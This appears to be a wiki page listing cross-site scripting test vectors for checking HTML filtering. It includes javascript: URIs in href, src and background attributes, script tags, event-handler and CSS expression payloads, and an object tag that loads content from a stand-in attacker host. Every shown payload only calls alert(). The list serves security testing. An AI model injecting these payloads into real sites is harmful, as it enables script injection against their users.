- Usage of <a> tag with the 'ahref' attribute:
No Format |
---|
<a href='javascript:alert("Test");'>Test 1</a> <a href='javascript:alert("Test Vulnerability through a href unicode");'>Test 2</a> (or) [javascript:alert('Test Vulnerability through a href');] |
- Usage of JavaScript:
No Format |
---|
<script>alert('Test Vulnerability through script');</script> |
- Usage of script with include:
No Format |
---|
<script type="text/javascript" src="https://<somesite>/include.js"></script> |
- Usage if iframe with include:
No Format |
---|
<iframe src="https://bobswift.atlassian.com"></iframe> |
- Usage of 'onXxx' events irrespective of the tags:
No Format |
---|
<div style="padding: 20px; opacity: 0;height: 20px;" onmouseout="alert('Test Vulnerbility through onXxx events')"></div> <img src="smiley.gif" alt="Smiley face" height="42" width="42" onerror="alert('No file found')"> |
- Usage of script in the src attribute:
No Format |
---|
<img src="javascript:alert("XSS");"> <img dynsrc="javascript:alert('XSS')"> <img lowsrc="javascript:alert('XSS')"> <input type="image" src="javascript:alert('XSS');"> |
- Usage of script in the background attribute:
No Format |
---|
<body background="javascript:alert("XSS")"> <table background="javascript:alert('XSS')"> <td background="javascript:alert('XSS')"> |
- Usage of link tag with href:
No Format |
---|
<link rel="stylesheet" href="javascript:alert('XSS');"> |
- Usage of script in the style attribute:
No Format |
---|
<div style="background-image: url(javascript:alert('XSS'))"> <div style="width: expression(alert('XSS'));"> |
- Usage of object with include:
No Format |
---|
<object type="text/x-scriptlet" data="http://hacker.com/xss.html"> |